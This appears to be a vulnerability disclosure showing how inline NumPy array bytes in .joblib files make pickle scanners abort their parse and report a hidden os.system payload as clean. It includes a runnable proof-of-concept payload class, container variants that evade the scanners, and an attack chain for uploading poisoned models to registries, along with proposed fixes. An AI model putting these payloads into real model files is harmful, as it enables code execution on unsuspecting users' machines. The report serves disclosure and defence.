Joblib Scanner Bypass via Inline NumPy Array Bytes

Summary

A malicious .joblib file carrying an os.system RCE payload is detected by 0 of 4 scanners (picklescan, modelscan, modelaudit, and a local ClamAV) yet executes arbitrary commands on joblib.load(). The evasion requires no payload obfuscation: the dangerous os.system global is present in plaintext opcodes. Scanners never reach it because inline raw NumPy array bytes cause a mid-stream parse failure that each of these scanners treats as "clean."

Affected scanners: picklescan 1.0.4, modelscan 0.8.8, modelaudit 0.2.45, ClamAV 1.5.2
Affected format: Joblib (.joblib), uncompressed, standard format
Impact: Arbitrary code execution at model load time, bypassing ProtectAI safety scan
Environment: Python 3.14.5, joblib 1.5.3, numpy 2.4.6, scikit-learn 1.8.0

Vulnerability

Root Cause

joblib's NumpyPickler serializes NumPy arrays by writing raw array bytes inline in the pickle stream, between standard pickle opcodes. joblib's NumpyUnpickler knows how to skip past these bytes (it overrides the BUILD opcode handler to call wrapper.read_array() which advances the file cursor). However, pickle scanners use pickletools.genops or equivalent opcode walkers that are not aware of these inline raw bytes. When the scanner hits a raw float/int byte mid-stream, it misinterprets it as a pickle opcode, fails with a ValueError, and silently returns "clean" instead of flagging the parse failure.

If an attacker places a malicious __reduce__ object after a NumPy array in pickle traversal order, the scanner aborts before reaching the malicious opcodes. The loader processes the entire file correctly, executing the payload.
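The fail-open behavior can be illustrated with the standard library alone. The sketch below is a simulation, not a real joblib file: it hand-assembles a protocol 2 opcode stream, splices eight raw float64 bytes into it at the point where joblib would write array data, and walks the result with pickletools.genops. The names `naive_scan`, `PREFIX`, `RAW_ARRAY`, and `SUFFIX` are illustrative assumptions, and the stream is only parsed, never loaded.

```python
import pickletools
import struct

# Hand-built opcode stream (illustrative only, not produced by joblib).
PREFIX = b"\x80\x02" + b"(" + b"X\x05\x00\x00\x00array"  # PROTO 2, MARK, BINUNICODE 'array'
RAW_ARRAY = struct.pack("<d", 1.0)                         # 8 raw float64 bytes; the first is 0x00
SUFFIX = (
    b"cos\nsystem\n"            # GLOBAL 'os system'
    b"X\x04\x00\x00\x00echo"    # BINUNICODE 'echo'
    b"\x85R"                    # TUPLE1, REDUCE
    b"t."                       # TUPLE, STOP
)

def naive_scan(data):
    """Walk opcodes like a fail-open scanner; return (globals_seen, error)."""
    globals_seen = []
    try:
        for opcode, arg, _pos in pickletools.genops(data):
            if opcode.name == "GLOBAL":
                globals_seen.append(arg)
    except ValueError as exc:
        # A fail-open scanner stops here and reports only what it saw so far.
        return globals_seen, exc
    return globals_seen, None

# Bypass layout: raw bytes sit between the scanner and the dangerous global.
bypass_globals, bypass_error = naive_scan(PREFIX + RAW_ARRAY + SUFFIX)
# Control layout: same opcodes without the inline raw bytes.
control_globals, control_error = naive_scan(PREFIX + SUFFIX)

print("with inline bytes:   ", bypass_globals, "| error:", bypass_error)
print("without inline bytes:", control_globals, "| error:", control_error)
```

In the first call the walker raises on the 0x00 byte before it ever sees the GLOBAL opcode, so a scanner that maps "exception" to "nothing found" reports the file as clean. In the second call the same opcodes are walked to STOP and `os system` is visible.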

Attack Requirements

A pickle container (tuple, list, dict, or nested) serialized via joblib.dump
At least one NumPy ndarray (any dtype, ≥1 element) positioned before the malicious object in pickle traversal order
A malicious object with __reduce__ returning a dangerous callable (e.g., os.system)

Why This Is Not the Known Joblib Compression Bypass

The previously reported joblib bypass (PickleCloak Appendix B.1) involves compressed joblib files where the compression magic bytes at position 0 cause scanners to fail immediately. This bypass uses uncompressed, standard-format joblib files. The parse failure occurs mid-stream due to inline NumPy array bytes, not at the start of the file. The mechanism is fundamentally different.

Files

File	Description
`malicious_model.joblib`	PoC: fitted LinearRegression + malicious CustomLR in a tuple. 648 bytes.
`poc_generate.py`	Generates the malicious .joblib file
`poc_verify.py`	Scans with all scanners and loads to confirm RCE
`generalized_poc.py`	8 additional variants proving generalization (no sklearn needed)

Reproduction

Step 1: Install dependencies

pip install joblib numpy scikit-learn picklescan modelscan modelaudit fickling

Step 2: Generate the PoC (or use the provided `malicious_model.joblib`)

python poc_generate.py

Step 3: Scan — observe all scanners report clean

picklescan --path malicious_model.joblib
# Expected: 0 infected files, 0 dangerous globals

modelscan -p malicious_model.joblib
# Expected: No issues found

python -c "
from modelaudit.core import scan_model_directory_or_file
result = scan_model_directory_or_file('malicious_model.joblib')
print('malicious:', result.get('malicious', False))
print('verdict:', result.get('pickle_verdict', False))
"
# Expected: malicious: False, verdict: False

Step 4: Load — observe code execution

python -c "import joblib; joblib.load('malicious_model.joblib')"
# Expected output includes: This is a malicious payload!

Step 5: Verify with controls

python poc_verify.py
# Runs full matrix: bypass cases (clean) vs control cases (detected)

Scanner Results

Bypass case: `(fitted_LinearRegression, malicious_CustomLR)`

Scanner	Version	Verdict	Detects `os.system`?
picklescan	1.0.4	0 infected	No — parse aborts before reaching REDUCE
modelscan	0.8.8	No issues found	No — parse aborts silently
modelaudit	0.2.45	malicious: False	No — logs WARNING but verdict stays safe
fickling	0.1.11	LIKELY_OVERTLY_MALICIOUS	No — flags NumpyArrayWrapper (fires on ALL fitted joblib files, including benign ones)
ClamAV	1.5.2	CLEAN	No — signatures gated on ZIP/torch container

Control case: `(malicious_CustomLR, fitted_LinearRegression)` — reversed tuple order

Scanner	Version	Verdict	Detects `os.system`?
picklescan	1.0.4	Dangerous	Yes: REDUCE precedes array bytes
modelscan	0.8.8	No issues found	No: modelscan is fail-open even when a dangerous global was already observed
modelaudit	0.2.45	CRITICAL	Yes: REDUCE precedes array bytes

Note: modelscan appears fail-open on parse abort regardless of prior findings. This is a separate issue.

Generalization

The bypass does NOT require scikit-learn, fitted models, or any specific container shape. Minimal example:

import numpy as np
import joblib

class Detonator:
    def __reduce__(self):
        import os
        return (os.system, ('echo PWNED',))

# Any numpy array before the malicious object triggers the bypass
joblib.dump((np.array([1.0]), Detonator()), 'minimal_bypass.joblib')

# Scanners: clean. Loader: executes 'echo PWNED'

Tested container shapes (each evades 4 of the 5 scanners tested; only fickling flags the file, and it also flags benign fitted joblib files):

(np.array([1.0]), Detonator())
[np.array([1.0, 2.0, 3.0]), Detonator()]
{"data": np.array([1.0]), "evil": Detonator()}
{"outer": (np.array([1.0]), Detonator())}
(np.zeros(10, dtype=np.int64), Detonator())

Real-World Impact

Any fitted scikit-learn model saved with joblib.dump can serve as a carrier for this bypass. A fitted model contains NumPy arrays (the learned coefficients), which produce inline raw bytes. An attacker can:

1. Take a legitimate fitted sklearn model
2. Bundle it with a malicious __reduce__ object in a tuple
3. Upload to HuggingFace or any model registry
4. ProtectAI's ModelScan reports "No issues found"
5. Victim downloads and calls joblib.load() → RCE

Suggested Fixes

For scanner maintainers (picklescan, modelscan, modelaudit):

Fail-closed on parse abort. Any pickletools.genops mid-stream exception should be treated as CRITICAL/suspicious, not silently clean.
Format-aware parsing. Recognize joblib.numpy_pickle.NumpyArrayWrapper in the opcode stream and consume the documented inline-bytes region instead of interpreting raw array bytes as opcodes.
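A minimal sketch of the fail-closed idea, using only the standard library. The function name `scan_fail_closed`, the three verdict strings, and the small `DANGEROUS_GLOBALS` set are assumptions made for illustration, not any scanner's real API. The sketch checks only the GLOBAL opcode; a real scanner would also need to resolve STACK_GLOBAL and would still benefit from format-aware parsing.

```python
import pickle
import pickletools

# Illustrative denylist; real scanners maintain much larger lists.
DANGEROUS_GLOBALS = {"os system", "posix system", "nt system",
                     "builtins eval", "builtins exec"}

def scan_fail_closed(data):
    """Return 'dangerous', 'suspicious', or 'clean' for a pickle byte string."""
    reached_stop = False
    try:
        for opcode, arg, _pos in pickletools.genops(data):
            if opcode.name == "GLOBAL" and arg in DANGEROUS_GLOBALS:
                return "dangerous"
            if opcode.name == "STOP":
                reached_stop = True
    except Exception:
        # Any parse failure means part of the stream was never inspected.
        return "suspicious"
    # Only a stream walked all the way to STOP may be called clean.
    return "clean" if reached_stop else "suspicious"

benign = pickle.dumps([1, 2, 3], protocol=2)
# Simulated inline raw bytes in front of a dangerous global (never loaded).
corrupted = b"\x80\x02(" + b"\x00" * 8 + b"cos\nsystem\n."

print(scan_fail_closed(benign))     # clean
print(scan_fail_closed(corrupted))  # suspicious
```

The design choice is that "clean" is a positive result that must be earned by reaching STOP, while every other outcome defaults to a non-clean verdict.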

For joblib maintainers:

Document the inline-bytes protocol so scanner authors can implement format-aware walkers.
Consider providing a joblib.safe_load(path, *, allowed_globals) analogous to PyTorch's weights_only=True.
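The allowlist idea behind such a loader can be sketched with the standard library's documented `pickle.Unpickler.find_class` hook. This is not joblib code: `AllowlistUnpickler` and `safe_loads` are hypothetical names, and a joblib-aware variant would presumably need to apply the same check inside joblib's own unpickler and allow the globals that array reconstruction requires.

```python
import io
import pickle

class AllowlistUnpickler(pickle.Unpickler):
    """Unpickler that resolves only explicitly allowed (module, name) pairs."""

    def __init__(self, file, allowed_globals):
        super().__init__(file)
        self._allowed = set(allowed_globals)

    def find_class(self, module, name):
        # Called for every global the stream references; reject unknown ones.
        if (module, name) not in self._allowed:
            raise pickle.UnpicklingError(
                f"global {module}.{name} is not allowed")
        return super().find_class(module, name)

def safe_loads(data, *, allowed_globals=()):
    """Hypothetical helper: unpickle bytes under an allowlist of globals."""
    return AllowlistUnpickler(io.BytesIO(data), allowed_globals).load()

# Plain containers reference no globals, so an empty allowlist suffices.
print(safe_loads(pickle.dumps({"coef": [1.0, 2.0]})))

# A stream that merely references os.system is rejected before any call.
try:
    safe_loads(b"cos\nsystem\n.")
except pickle.UnpicklingError as exc:
    print("rejected:", exc)
```

Because the check runs when a global is resolved rather than when it is called, the payload's callable is never obtained, regardless of where it sits in the stream.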